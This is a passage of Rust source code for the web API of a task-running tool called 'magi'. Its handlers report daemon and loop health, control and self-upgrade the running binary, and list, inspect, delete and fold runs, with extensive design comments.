1693    /// Free bytes on the volume holding the runs, when measurable.
1694    #[serde(skip_serializing_if = "Option::is_none")]
1695    free_bytes: Option<u64>,
1696    /// Everything the runs directory occupies, unreadable runs included.
1697    runs_bytes: u64,
1698    /// Everything the runs' worktrees occupy.
1699    worktrees_bytes: u64,
1700    /// The shared build cache's size, when the config names one.
1701    #[serde(skip_serializing_if = "Option::is_none")]
1702    cache_bytes: Option<u64>,
1703}
1704
1705impl DiskView {
1706    /// Measure the three directories and re-read the config's cache.
1707    fn of(ui: &Ui) -> Self {
1708        let cache_bytes = Config::discover(&ui.repo, None)
1709            .ok()
1710            .and_then(|(cfg, _)| cfg.cache_dir())
1711            .map(|dir| crate::disk::dir_size(&dir));
1712        Self {
1713            free_bytes: crate::disk::free_bytes(&ui.runs).ok(),
1714            runs_bytes: crate::disk::dir_size(&ui.runs),
1715            worktrees_bytes: crate::disk::dir_size(&ui.worktrees_root),
1716            cache_bytes,
1717        }
1718    }
1719}
1720
1721/// The daemon's state as the UI presents it.
1722#[derive(Debug, Serialize)]
1723struct DaemonView {
1724    running: bool,
1725    idle: Option<bool>,
1726    pid: Option<u32>,
1727    /// Every task and run currently in flight. Empty when idle; more than
1728    /// one entry when `Config::daemon.max_concurrent_runs` has more than one
1729    /// run going at once.
1730    current: Vec<daemon::Current>,
1731    completed: Option<u64>,
1732    stale_for_secs: Option<i64>,
1733}
1734
1735impl DaemonView {
1736    /// Judge a status file. Staleness is [`daemon::Reading::running`]'s call,
1737    /// not this UI's — a crashed daemon must not look alive here while
1738    /// `doctor` calls it dead.
1739    fn of(status: Option<daemon::Reading>) -> Self {
1740        let Some(status) = status else {
1741            return Self {
1742                running: false,
1743                idle: None,
1744                pid: None,
1745                current: Vec::new(),
1746                completed: None,
1747                stale_for_secs: None,
1748            };
1749        };
1750        let now = Timestamp::now();
1751        let age = status.age_secs(now);
1752        Self {
1753            running: status.running(now),
1754            idle: Some(status.idle),
1755            pid: status.pid,
1756            current: status.current,
1757            completed: Some(status.completed),
1758            stale_for_secs: age,
1759        }
1760    }
1761}
1762
1763async fn health(State(ui): State<Arc<Ui>>) -> ApiResult<Json<HealthView>> {
1764    blocking(move || {
1765        // One read of the status file for the two fields that describe it, so
1766        // `daemon` and `loop` in the same answer cannot disagree about who is
1767        // running the loop.
1768        let reading = daemon::read_status(&ui.home);
1769        // Read on its own line, not inside the literal below: the loop's lock
1770        // is not reentrant, and a guard taken as a temporary there would still
1771        // be held when `loop_view` took it again.
1772        let loop_rev = ui.lock_loop().rev;
1773        let update = cached_update_view(&ui.repo);
1774        let upgrade = updater::read_progress(&ui.home).map(|p| upgrade_progress_view(&ui, p));
1775        Ok(Json(HealthView {
1776            version: env!("CARGO_PKG_VERSION"),
1777            home: ui.home.display().to_string(),
1778            queue_rev: ui.queue.revision(),
1779            runs_rev: runs_revision(&ui.runs),
1780            questions_rev: ui.questions.revision(),
1781            talks_rev: ui.talks.revision(),
1782            notifications_rev: ui.notices.revision(),
1783            notifications_unread: ui.notices.count_unread(),
1784            loop_rev,
1785            runs_unreadable: runs_unreadable(&ui.runs),
1786            questions_open: ui.questions.count_open(),
1787            questions_needs_owner: ui.questions.count_needs_owner(),
1788            daemon: DaemonView::of(reading.clone()),
1789            looping: ui.loop_view(reading),
1790            disk: DiskView::of(&ui),
1791            update,
1792            upgrade,
1793        }))
1794    })
1795    .await
1796}
1797
1798/// What `/api/loop` answers, and what `/api/health` carries as `loop`.
1799#[derive(Debug, Serialize)]
1800struct LoopView {
1801    /// A loop is running in *this* process.
1802    running: bool,
1803    /// It has been asked to stop and is still finishing a run.
1804    ///
1805    /// [`daemon::Stop::finishing`]'s answer rather than "the flag is set",
1806    /// because the two differ exactly where it matters: a loop asked to stop
1807    /// while idle is gone within one poll interval, and one asked to stop
1808    /// mid-run keeps going for as long as the graph takes. The operator needs
1809    /// to be told which of those they are waiting for.
1810    stopping: bool,
1811    /// A park was asked for: the run in flight stops at its next node
1812    /// boundary rather than finishing.
1813    ///
1814    /// Separate from `stopping` because the two promise different waits. A
1815    /// stop is "when this competition ends", which can be an hour; a park is
1816    /// "after the step it is on", which is minutes and is what an operator
1817    /// waiting to replace the binary needs to see.
1818    parking: bool,
1819    /// The loop is this process's own.
1820    ///
1821    /// Spelled separately from `running` for the front end's sake, even
1822    /// though inside this process the two move together: `running: false`
1823    /// with `daemon.running: true` is the case where the operator's own `magi
1824    /// serve` owns the loop, and `owned` is the field that tells the UI its
1825    /// buttons have to explain that rather than pretend.
1826    owned: bool,
1827    /// Repository the loop uses for tasks that name none - what it was
1828    /// started with while it runs, and what a start would use before that.
1829    repo: String,
1830    /// Merge mode override in force, or `null` when each repository's own
1831    /// config decides.
1832    merge: Option<String>,
1833    /// Why the last loop in this process ended, when it ended badly.
1834    ///
1835    /// The only place a crashed loop is visible to someone holding a phone.
1836    /// It is logged at error level as well, but a terminal nobody kept open
1837    /// is not a report, and a loop that died at 3am must not read as merely
1838    /// stopped in the morning. Named as [`Task::last_error`] is, because it
1839    /// answers the same question about the same kind of failure.
1840    last_error: Option<String>,
1841    /// The status file, judged the same way `/api/health` judges it: this is
1842    /// what says whether a loop is alive in some *other* process.
1843    daemon: DaemonView,
1844}
1845
1846/// A loop another process already owns.
1847///
1848/// `<home>/daemon.json` is the only cross-process signal there is, so this is
1849/// the whole of the test: a heartbeat no older than [`daemon::STALE_SECS`],
1850/// published by a pid that is not ours. Excluding our own pid is what makes
1851/// stopping work at all - the loop this process runs writes that file too, so
1852/// a check that ignored the pid would decide the operator's own UI was a
1853/// stranger and refuse to stop the loop it had just started.
1854#[derive(Debug, Clone, Copy)]
1855struct Foreign {
1856    /// The pid the other process published, when it published one.
1857    pid: Option<u32>,
1858}
1859
1860impl Foreign {
1861    /// Another process's live loop, or `None` when this process is free to
1862    /// run one.
1863    fn of(reading: Option<&daemon::Reading>) -> Option<Self> {
1864        let reading = reading?;
1865        if !reading.running(Timestamp::now()) {
1866            return None;
1867        }
1868        match reading.pid {
1869            Some(pid) if pid == std::process::id() => None,
1870            // A fresh heartbeat with no pid in it is still evidence of a live
1871            // daemon. "Some other process" is the honest answer, and refusing
1872            // to start beside it is the safe one.
1873            pid => Some(Self { pid }),
1874        }
1875    }
1876
1877    /// How a conflict names it. The pid is the whole point of the message: it
1878    /// is what the operator needs to find the terminal that owns the loop.
1879    fn who(&self) -> String {
1880        match self.pid {
1881            Some(pid) => format!("another magi process (pid {pid})"),
1882            None => "another magi process".to_owned(),
1883        }
1884    }
1885}
1886
1887/// How a loop is started, as a future this module can hold onto.
1888///
1889/// A plain function pointer, so [`Ui`] stays `Debug` and `Clone` without a
1890/// trait object or a hand-written `Debug` impl for the sake of one seam.
1891type Launch = fn(daemon::Opts, daemon::Stop) -> Pin<Box<dyn Future<Output = Result<()>> + Send>>;
1892
1893/// The real loop: [`daemon::serve_until`], boxed to fit [`Launch`].
1894fn launch_daemon(
1895    opts: daemon::Opts,
1896    stop: daemon::Stop,
1897) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
1898    Box::pin(daemon::serve_until(opts, stop))
1899}
1900
1901/// The loop this process runs, behind one lock.
1902#[derive(Debug, Default)]
1903struct LoopState {
1904    /// The loop, while there is one.
1905    live: Option<Live>,
1906    /// Bumped on every change to this struct, and streamed as `loop_rev`.
1907    ///
1908    /// The loop is in-process state rather than a file, so nothing on disk
1909    /// would tell a second phone that the first one started it. Without this
1910    /// counter the only way to learn about a start, a stop request or a crash
1911    /// would be to poll `/api/loop`, which is the thing the change stream
1912    /// exists to avoid on a mobile link.
1913    rev: u64,
1914    /// Why the last loop ended, when it ended badly. See
1915    /// [`LoopView::last_error`].
1916    last_error: Option<String>,
1917}
1918
1919/// A loop in flight.
1920#[derive(Debug)]
1921struct Live {
1922    /// The cooperative stop, shared with the loop task.
1923    stop: daemon::Stop,
1924    /// The task itself, kept only to answer whether it is still there: a loop
1925    /// that panicked never records its own end, and without this the view
1926    /// would go on reporting a loop that no longer exists - the one lie that
1927    /// would leave the operator with no button to press.
1928    handle: tokio::task::JoinHandle<()>,
1929    /// What the loop was started with, so the view reports the repository and
1930    /// merge mode its runs will actually use rather than what an edit to the
1931    /// config since would give.
1932    opts: daemon::Opts,
1933}
1934
1935impl Live {
1936    /// Is the task still there? See [`Live::handle`].
1937    fn alive(&self) -> bool {
1938        !self.handle.is_finished()
1939    }
1940}
1941
1942/// Take the loop lock, recovering from a poisoned one.
1943///
1944/// What this mutex holds is a stop flag, a task handle and two counters, none
1945/// of which a panic elsewhere can leave in a state worth refusing to read.
1946/// Propagating the poison instead would mean an operator who can see the loop
1947/// running and can no longer stop it from the only surface they have.
1948fn lock_or_recover(state: &Mutex<LoopState>) -> MutexGuard<'_, LoopState> {
1949    state.lock().unwrap_or_else(PoisonError::into_inner)
1950}
1951
1952/// `GET /api/loop`.
1953async fn loop_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<LoopView>> {
1954    blocking(move || {
1955        let reading = daemon::read_status(&ui.home);
1956        Ok(Json(ui.loop_view(reading)))
1957    })
1958    .await
1959}
1960
1961/// The body of `POST /api/loop`.
1962///
1963/// One required field and nothing else: no `default` and no unknown fields,
1964/// so a body that fails to say which way the switch was flipped is a 400
1965/// rather than a tap that quietly does the opposite of what was pressed.
1966#[derive(Debug, Deserialize)]
1967#[serde(deny_unknown_fields)]
1968struct LoopCommand {
1969    running: bool,
1970    /// Stop the run in flight at its next node boundary rather than letting it
1971    /// finish.
1972    ///
1973    /// Defaults to false, so the plain stop keeps meaning what it meant: a
1974    /// competition is tens of minutes of paid work and finishing it is
1975    /// normally the cheapest thing to do. A park is for the operator who
1976    /// wants the process gone now - to replace the binary, most of all - and
1977    /// it costs at most the node in progress because every node writes its
1978    /// state before the next one starts.
1979    #[serde(default)]
1980    park: bool,
1981}
1982
1983/// `POST /api/loop` - start the loop in this process, or ask it to stop.
1984///
1985/// Answers with the view rather than waiting for the loop to reach the state
1986/// that was asked for. Starting is immediate anyway; stopping is not, and the
1987/// wait is a run's worth of minutes, which is not a thing to hold a phone's
1988/// request open for. `stopping` in the answer is what the operator watches
1989/// instead.
1990async fn loop_post(
1991    State(ui): State<Arc<Ui>>,
1992    body: std::result::Result<Json<LoopCommand>, JsonRejection>,
1993) -> ApiResult<Json<LoopView>> {
1994    // Taken as a `Result` so a malformed body is a 400 like every other route
1995    // here, rather than axum's default 422 that the UI has no branch for.
1996    let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
1997    blocking(move || {
1998        let reading = daemon::read_status(&ui.home);
1999        let foreign = Foreign::of(reading.as_ref());
2000        if body.running {
2001            ui.start_loop(foreign)?;
2002        } else {
2003            ui.stop_loop(foreign, body.park)?;
2004        }
2005        Ok(Json(ui.loop_view(reading)))
2006    })
2007    .await
2008}
2009
2010/// What `POST /api/upgrade` set in motion.
2011#[derive(Debug, Serialize)]
2012struct UpgradeView {
2013    /// The version this process is running.
2014    from: String,
2015    /// The release it is replacing itself with, when there is one.
2016    to: Option<String>,
2017    /// A run was parked first, and this is its id.
2018    parked: Option<String>,
2019    /// What the operator should expect to happen next.
2020    detail: String,
2021}
2022
2023/// `POST /api/upgrade` - replace this binary with the newest release and come
2024/// back on it.
2025///
2026/// The one thing the deck could not do for itself. Every fix landed today
2027/// either waited for a competition to end or went in with the deck stopped,
2028/// because `cargo install` cannot overwrite a running executable on Windows.
2029/// `kaishin` can: `self_replace` **renames** the running image aside and puts
2030/// the new one in its place, so the swap itself needs no downtime. Only the
2031/// restart does, and the order is the whole design:
2032///
2033/// 1. **Park.** A run in flight stops at its next node boundary and stays
2034///    resumable, so this costs at most the node in progress rather than the
2035///    competition. Without it the honest choices were waiting an hour or
2036///    discarding paid agent work.
2037/// 2. **Replace.** The new binary goes into place while this one still runs.
2038/// 3. **Hand over.** [`serve`] drops the listener, *then* spawns the
2039///    successor - see [`spawn_successor`] for what happens in the other
2040///    order.
2041/// 4. **Resume.** The next loop carries the parked run on rather than
2042///    competing again; see `daemon::attempt`.
2043///
2044/// Answers **202**: the reply has to reach the phone while this process can
2045/// still send one, and the phone learns the deck is back by reconnecting.
2046async fn upgrade_post(State(ui): State<Arc<Ui>>) -> ApiResult<(StatusCode, Json<UpgradeView>)> {
2047    let reading = daemon::read_status(&ui.home);
2048    if let Some(other) = Foreign::of(reading.as_ref()) {
2049        return Err(ApiError::conflict(format!(
2050            "the loop belongs to {}, so replacing this binary would leave \
2051             that process running an old one against the same queue. Upgrade \
2052             where it was started.",
2053            other.who()
2054        )));
2055    }
2056
2057    // The same kill switch the background check honours (`disabled_by_env`),
2058    // checked before anything else for the same reason it is read before the
2059    // config there: an operator who set `MAGI_NO_AUTOUPDATE` means "never
2060    // contact GitHub from this process", and a button press must not
2061    // override that any more than a broken `magi.toml` may.
2062    if crate::updater::disabled_by_env() {
2063        return Ok((
2064            StatusCode::OK,
2065            Json(UpgradeView {
2066                from: env!("CARGO_PKG_VERSION").to_owned(),
2067                to: None,
2068                parked: None,
2069                detail: format!(
2070                    "Automatic updates are disabled by {}. Nothing was parked \
2071                     and nothing restarted.",
2072                    crate::updater::NO_AUTOUPDATE_ENV
2073                ),
2074            }),
2075        ));
2076    }
2077
2078    // Asked before anything is disturbed. Restarting when there is nothing
2079    // to install is not a harmless no-op: it parks the run in flight and
2080    // drops every connection to pay for an upgrade that did not happen. A
2081    // probe against a deck already on the newest build did exactly that.
2082    let (cfg, _) = Config::discover(&ui.repo, None).unwrap_or_default();
2083    let from = env!("CARGO_PKG_VERSION").to_owned();
2084    let latest = match crate::updater::Checker::new(&cfg.update) {
2085        Some(checker) => checker
2086            .newer_release()
2087            .await
2088            .map_err(|e| ApiError::internal(format!("check for a release: {e:#}")))?,
2089        None => None,
2090    };
2091    let Some(latest) = latest else {
2092        return Ok((
2093            StatusCode::OK,
2094            Json(UpgradeView {
2095                from,
2096                to: None,
2097                parked: None,
2098                detail: "Already on the newest release. Nothing was parked \
2099                         and nothing restarted."
2100                    .to_owned(),
2101            }),
2102        ));
2103    };
2104
2105    // Parked before anything is replaced: a successor that came up while a
2106    // run was mid-node would find a run nobody is driving.
2107    let parked = ui.park_for_upgrade()?;
2108    let detail = match &parked {
2109        // Honest about the wait. A park takes effect at the *next* node
2110        // boundary, so a run mid-implement finishes that wave first - up to
2111        // `timeout_implement`, an hour by default. Saying "restarting now"
2112        // would make the deck look wedged for the rest of it.
2113        Some(run) => format!(
2114            "Run {} is parking at its next step, which can take as long as \
2115             the step it is on - up to an hour for an implement wave. The \
2116             deck replaces itself once it parks, comes back, and the loop \
2117             carries that run on from where it stopped. Nothing is lost if \
2118             you close this.",
2119            crate::run::short_of(run)
2120        ),
2121        None => "The deck replaces itself and comes back. Nothing was in \
2122                 flight to park."
2123            .to_owned(),
2124    };
2125
2126    // Recorded before the spawn, not inside it: the phone's next `/api/health`
2127    // poll must see a `Downloading` stage immediately, not whenever the
2128    // spawned task happens to get scheduled.
2129    let mut progress = updater::Progress::new(from.clone(), latest.tag_name.clone());
2130    progress.parked_run = parked.clone();
2131    let _ = updater::write_progress(&ui.home, &progress);
2132
2133    let home = ui.home.clone();
2134    tokio::spawn(async move {
2135        if let Err(e) = upgrade_and_restart(home.clone()).await {
2136            tracing::error!("the upgrade did not complete: {e:#}");
2137            if let Some(mut progress) = updater::read_progress(&home) {
2138                progress.fail(format!("{e:#}"));
2139                let _ = updater::write_progress(&home, &progress);
2140            }
2141        }
2142    });
2143
2144    Ok((
2145        StatusCode::ACCEPTED,
2146        Json(UpgradeView {
2147            from,
2148            to: Some(latest.tag_name),
2149            parked,
2150            detail,
2151        }),
2152    ))
2153}
2154
2155/// Replace the binary, then ask [`serve`] to hand the address over.
2156///
2157/// Separated from the handler so the 202 is already on its way, and separated
2158/// from the spawn so the successor starts only after the listener is dropped.
2159async fn upgrade_and_restart(home: PathBuf) -> Result<()> {
2160    // `yes` and non-interactive: nobody is at a terminal, and a prompt would
2161    // hang the upgrade for as long as the process lives.
2162    crate::updater::run_self_update(true, false, true).await?;
2163    tracing::info!("binary replaced - asking the server to hand over");
2164    if let Some(mut progress) = updater::read_progress(&home) {
2165        progress.advance(updater::Stage::Replaced);
2166        let _ = updater::write_progress(&home, &progress);
2167    }
2168    HANDOVER.notify_one();
2169    Ok(())
2170}
2171
2172/// One row in the run list.
2173///
2174/// The list route returns this rather than whole `RunState`s: the summary of a
2175/// run is a few hundred bytes and the state is megabytes, and the difference
2176/// is what makes the history usable on a mobile link.
2177#[derive(Debug, Serialize)]
2178struct RunSummary {
2179    id: String,
2180    short: String,
2181    status: String,
2182    done: bool,
2183    instruction: String,
2184    title: String,
2185    repo: String,
2186    repo_name: String,
2187    created_at: String,
2188    updated_at: String,
2189    candidates: usize,
2190    viable: usize,
2191    judges: usize,
2192    winner: Option<char>,
2193    reviews: usize,
2194    quota_losses: usize,
2195    event: Option<String>,
2196    /// The later attempt at the same task that replaced this one, if any.
2197    ///
2198    /// Two cards with one title is otherwise unreadable: this is what lets
2199    /// the deck say "superseded by 4043" on the older of the pair.
2200    superseded_by: Option<String>,
2201    /// Blocked on a question nobody has answered.
2202    ///
2203    /// Derived from the question store rather than stored on the run: an agent
2204    /// calling `magi ask` blocks mid-node, and writing a status from there
2205    /// would race the graph's own save of `run.json` and be overwritten at the
2206    /// next node boundary. Asking the store is always true and never races.
2207    waiting: bool,
2208    /// Whether the process recorded as driving this run can still be proven
2209    /// alive. The card uses a confirmed-dead non-terminal run as `stale`,
2210    /// rather than presenting its last graph node as still in flight.
2211    live: crate::run::Liveness,
2212    /// The land loop's last look at the pull request, when there is one.
2213    pr: Option<crate::run::PrRecord>,
2214    /// `status` is `"ready"`, but `[merge] mode = "none"` left it there by
2215    /// design — never picked up by the PR-polling merge watcher, unlike an
2216    /// ordinary `Ready` that may still be a live landing candidate. See
2217    /// [`RunState::unmerged_by_design`]. The front end reads this rather than
2218    /// re-deriving the same check from `status` and `merge.mode` itself.
2219    unmerged_by_design: bool,
2220}
2221
2222impl RunSummary {
2223    fn of(state: &RunState, waiting: bool, live: crate::run::Liveness) -> Self {
2224        Self {
2225            id: state.id.clone(),
2226            short: state.short().to_owned(),
2227            status: status_word(state.status),
2228            done: state.status.done(),
2229            unmerged_by_design: state.unmerged_by_design(),
2230            instruction: state.instruction.clone(),
2231            title: title_from(&state.instruction, TITLE_MAX),
2232            repo: state.repo.display().to_string(),
2233            repo_name: state
2234                .repo
2235                .file_name()
2236                .map(|n| n.to_string_lossy().into_owned())
2237                .unwrap_or_default(),
2238            created_at: state.created_at.to_string(),
2239            updated_at: state.updated_at.to_string(),
2240            candidates: state.candidates.len(),
2241            viable: state.viable().len(),
2242            judges: state.config.graph.judges,
2243            winner: state.winner().map(|c| c.label),
2244            reviews: state.reviews.len(),
2245            quota_losses: state.quota.len(),
2246            event: state.events.last().map(|e| e.message.clone()),
2247            waiting,
2248            live,
2249            // Filled in by the list route, which is the only place that can
2250            // see a task's other attempts.
2251            superseded_by: None,
2252            pr: state.pr.clone(),
2253        }
2254    }
2255}
2256
2257/// `RunStatus` as the wire spells it. Every variant is one word, so this is
2258/// the same string `serde` writes for the status inside a full run.
2259fn status_word(status: RunStatus) -> String {
2260    // `RunStatus::as_str` rather than lowercasing the `Debug` spelling: this
2261    // was a third way of naming the same statuses, and one that changed
2262    // silently with a derive.
2263    status.as_str().to_owned()
2264}
2265
2266/// `?limit=`, clamped by the handler.
2267#[derive(Debug, Deserialize)]
2268struct ListQuery {
2269    #[serde(default)]
2270    limit: Option<usize>,
2271}
2272
2273async fn runs_list(
2274    State(ui): State<Arc<Ui>>,
2275    Query(q): Query<ListQuery>,
2276) -> ApiResult<Json<Vec<RunSummary>>> {
2277    let limit = q.limit.unwrap_or(LIST_DEFAULT).min(LIST_MAX);
2278    blocking(move || {
2279        let superseded = ui.queue.superseded();
2280        // Everything the per-run rows share is read once here. Asking per run
2281        // re-read every question file and the daemon status file for each of
2282        // hundreds of runs, and spawned a process probe per run on Windows.
2283        let open_runs: HashSet<String> = ui
2284            .questions
2285            .list()
2286            .into_iter()
2287            .filter(|q| q.status.open())
2288            .map(|q| q.run)
2289            .collect();
2290        let claimed: HashSet<String> =
2291            crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2292                .into_iter()
2293                .map(|c| c.run)
2294                .collect();
2295        let states = run_ids(&ui.runs)
2296            .into_iter()
2297            // A run whose state cannot be read is skipped, not fatal: a run
2298            // killed mid-write must not blank the history of every other one.
2299            // The detail route still explains it, which is where an operator
2300            // asking "what happened to that run" ends up.
2301            .filter_map(|id| read_run(&ui.runs, &id).ok())
2302            .take(limit);
2303        let probe = std::cell::RefCell::new(crate::proc::ProcProbe::real());
2304        let summaries = summarize(
2305            states,
2306            &open_runs,
2307            &claimed,
2308            &superseded,
2309            |p| probe.borrow_mut().status(p),
2310            |p| probe.borrow_mut().started_at(p),
2311        );
2312        Ok(Json(summaries))
2313    })
2314    .await
2315}
2316
2317/// The rows of the run list, given everything that is shared between them.
2318///
2319/// Pure over its inputs so a test can count how often the process queries are
2320/// asked; `status_q` / `identity_q` are the queries [`RunState::liveness_with`]
2321/// takes, called at most once per run.
2322fn summarize<I, S, D>(
2323    states: I,
2324    open_runs: &HashSet<String>,
2325    claimed: &HashSet<String>,
2326    superseded: &HashMap<String, String>,
2327    mut status_q: S,
2328    mut identity_q: D,
2329) -> Vec<RunSummary>
2330where
2331    I: IntoIterator<Item = RunState>,
2332    S: FnMut(u32) -> Option<bool>,
2333    D: FnMut(u32) -> Option<String>,
2334{
2335    states
2336        .into_iter()
2337        .map(|state| {
2338            let waiting = open_runs.contains(&state.id);
2339            let live =
2340                state.liveness_with(claimed.contains(&state.id), &mut status_q, &mut identity_q);
2341            let mut row = RunSummary::of(&state, waiting, live);
2342            row.superseded_by = superseded
2343                .get(&state.id)
2344                .map(String::as_str)
2345                .map(crate::run::short_of)
2346                .map(str::to_owned);
2347            row
2348        })
2349        .collect()
2350}
2351
2352/// A run as the detail route hands it to the phone.
2353///
2354/// The whole state, flattened, plus `instruction_md`: the Task panel renders
2355/// the instruction as markdown, and the raw `instruction` field this struct
2356/// still carries (unchanged) is what a client wanting the exact bytes reads
2357/// instead.
2358#[derive(Debug, Serialize)]
2359struct RunDetailView {
2360    #[serde(flatten)]
2361    state: RunState,
2362    instruction_md: Vec<md::Node>,
2363    /// Whether a process is actually still driving this run: `"live"`,
2364    /// `"dead"`, or `"unknown"` — see [`crate::run::Liveness`].
2365    ///
2366    /// `state.active` (flattened in above) is only ever cleared by the
2367    /// process that populated it; a killed one leaves its last wave's
2368    /// entries behind. Carrying this alongside is what lets the phone rail
2369    /// tell "this seat is still answering" from "this seat was still
2370    /// answering when whatever was driving this run died" without a second
2371    /// route — see `ActiveSeat`'s own docs for why the entry alone is not
2372    /// proof of either. A string rather than a bool on purpose: a daemon
2373    /// claim proves `"live"`, `driver_pid` answering dead proves `"dead"`,
2374    /// and neither proven is `"unknown"` — folding that third case into
2375    /// either end of a bool is exactly the wrong call for a phone screen an
2376    /// operator uses to decide whether to wait or to act.
2377    live: crate::run::Liveness,
2378    /// Same field and meaning as [`RunSummary::unmerged_by_design`] — kept
2379    /// alongside the flattened `state` rather than inside it, since
2380    /// `RunState` has no business knowing which of its own methods a caller
2381    /// wants serialized.
2382    unmerged_by_design: bool,
2383    /// Same field and meaning as [`RunSummary::superseded_by`] — the list
2384    /// route fills it from [`Queue::superseded`], the detail route from
2385    /// [`Queue::superseded_by`], and both read the same underlying task
2386    /// order. Without this the detail page could only ever show a red
2387    /// `BLOCKED`/`FAILED` chip on a run a later attempt had already finished,
2388    /// with nothing anywhere saying so — an operator opening it had no way
2389    /// to tell "this is done elsewhere" from "this still needs a retry".
2390    superseded_by: Option<String>,
2391    /// The task's current attempt, when this run is an older one — resolved
2392    /// from [`Queue::latest_attempt`] and this run's own state, not left for
2393    /// the client to derive.
2394    ///
2395    /// Three things a client cannot safely do on its own drove this onto the
2396    /// server: it has to name the chain's *current head*, not just the next
2397    /// attempt (`superseded_by` above), because an intermediate retry in a
2398    /// longer chain can itself still be unresolved; it has to resolve to a
2399    /// real id rather than a short id a client would have to guess a full id
2400    /// from, which is ambiguous the moment two runs share a suffix; and it
2401    /// has to read that head's own status directly, because whether a run
2402    /// list a client happens to have cached even contains that attempt
2403    /// depends on a page limit this route knows nothing about.
2404    latest_attempt: Option<LatestAttempt>,
2405}
2406
2407/// The task's current attempt, as seen from an older one's detail page.
2408#[derive(Debug, Serialize)]
2409struct LatestAttempt {
2410    id: String,
2411    short: String,
2412    /// Whether this attempt itself settled with a result nobody needs to
2413    /// act on further. Deliberately narrow: only `Merged` and `Ready` count.
2414    /// `VerifiedNoop` is excluded on purpose — it is a candidate's own
2415    /// unconfirmed claim that no change was needed, which is exactly why it
2416    /// settles the task through `Held` rather than `Done` and still waits on
2417    /// a human to check the evidence; showing an older run as "finished
2418    /// elsewhere" on the strength of an unverified claim would bury the
2419    /// thing that still needs a look. `Blocked`/`Failed`/`Stalled` and every
2420    /// in-flight status are excluded because they are exactly the
2421    /// unresolved states this field exists to tell apart from a real finish.
2422    resolved: bool,
2423}
2424
2425impl RunDetailView {
2426    fn of(
2427        state: RunState,
2428        live: crate::run::Liveness,
2429        superseded_by: Option<String>,
2430        latest_attempt: Option<LatestAttempt>,
2431    ) -> Self {
2432        Self {
2433            instruction_md: md::to_nodes(&state.instruction, &md::ImageBase::None),
2434            live,
2435            unmerged_by_design: state.unmerged_by_design(),
2436            superseded_by,
2437            latest_attempt,
2438            state,
2439        }
2440    }
2441}
2442
2443async fn run_detail(
2444    State(ui): State<Arc<Ui>>,
2445    Path(id): Path<String>,
2446) -> ApiResult<Json<RunDetailView>> {
2447    blocking(move || {
2448        let id = resolve_run(&ui.runs, &id)?;
2449        let state = read_run(&ui.runs, &id)?;
2450        let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2451        let live = state.liveness(daemon_claims);
2452        let superseded_by = ui
2453            .queue
2454            .superseded_by(&id)
2455            .as_deref()
2456            .map(crate::run::short_of)
2457            .map(str::to_owned);
2458        // Best-effort: an unreadable head (mid-write, or deleted) just means
2459        // this run's own status stands on its own, same as no later attempt
2460        // existing at all.
2461        let latest_attempt = ui.queue.latest_attempt(&id).and_then(|head_id| {
2462            read_run(&ui.runs, &head_id).ok().map(|head| LatestAttempt {
2463                short: head.short().to_owned(),
2464                resolved: matches!(head.status, RunStatus::Merged | RunStatus::Ready),
2465                id: head.id,
2466            })
2467        });
2468        Ok(Json(RunDetailView::of(
2469            state,
2470            live,
2471            superseded_by,
2472            latest_attempt,
2473        )))
2474    })
2475    .await
2476}
2477
2478/// `DELETE /api/runs/{id}`.
2479///
2480/// Remove a finished, folded run directory along with its artifacts.
2481/// Running runs and runs with unfolded candidate worktrees/branches cannot be
2482/// deleted. This never touches git worktrees or branches - except for a run
2483/// whose state this build cannot read at all, where there is no candidate
2484/// list to check and the wholesale removal `magi fold` already uses for that
2485/// case is the only meaningful "delete".
2486async fn run_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2487    let (id, unreadable) = {
2488        let ui = Arc::clone(&ui);
2489        blocking(move || {
2490            let id = resolve_run(&ui.runs, &id)?;
2491            match read_run(&ui.runs, &id) {
2492                Ok(state) => {
2493                    let in_flight =
2494                        crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2495                    state
2496                        .ensure_can_delete(in_flight)
2497                        .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2498                    let dir = ui.runs.join(&id);
2499                    std::fs::remove_dir_all(&dir)
2500                        .with_context(|| format!("remove run directory {}", dir.display()))?;
2501                    Ok((id, false))
2502                }
2503                Err(_) => {
2504                    // Unreadable: there is no candidate list to guard on, so
2505                    // a live daemon's claim is the only thing left to check -
2506                    // the same rule `run_fold` applies for the same reason.
2507                    if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2508                        return Err(ApiError::conflict(format!(
2509                            "run {id} is being worked on by a live daemon right now"
2510                        )));
2511                    }
2512                    Ok((id, true))
2513                }
2514            }
2515        })
2516        .await?
2517    };
2518    if unreadable {
2519        crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2520            .await
2521            .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2522    }
2523    let ui = Arc::clone(&ui);
2524    let done = id.clone();
2525    blocking(move || {
2526        // The agent that asked died with the run, so an open question would
2527        // keep asking the operator for a decision nobody can deliver.
2528        ui.questions.abandon_for_run(
2529            &done,
2530            &format!("run {done} was deleted, so nothing is waiting for this answer"),
2531        )?;
2532        Ok(())
2533    })
2534    .await?;
2535    Ok(StatusCode::NO_CONTENT)
2536}
2537
2538/// `POST /api/runs/{id}/fold`.
2539///
2540/// Remove a run's candidate worktrees and branches, keeping its record.
2541///
2542/// This exists because the deck answered "delete this run" with *"Candidates
2543/// must be folded before deleting. Run `magi fold` first."* — a phone being
2544/// told to open a terminal, in the one product whose point is that it does
2545/// not need one. The runs an operator most wants gone are the stalled and
2546/// blocked ones, and those are exactly the runs still holding worktrees:
2547/// three of them here held 53 GB.
2548///
2549/// The winner's tree goes too. A fold is what someone asks for when they are
2550/// finished with a run, and leaving one tree behind would leave the delete
2551/// button disabled for the same reason as before.
2552///
2553/// Refused while a live daemon is working on the run, on the rule that guards
2554/// deletion: folding underneath a running agent would pull the tree it is
2555/// editing out from under it.
2556///
2557/// A run whose state this build cannot read at all falls back to
2558/// [`crate::clean::fold_unreadable`] - there is no candidate list to fold
2559/// selectively, so the whole record's worktree goes wholesale, exactly what
2560/// `magi fold` does on the command line for the same run.
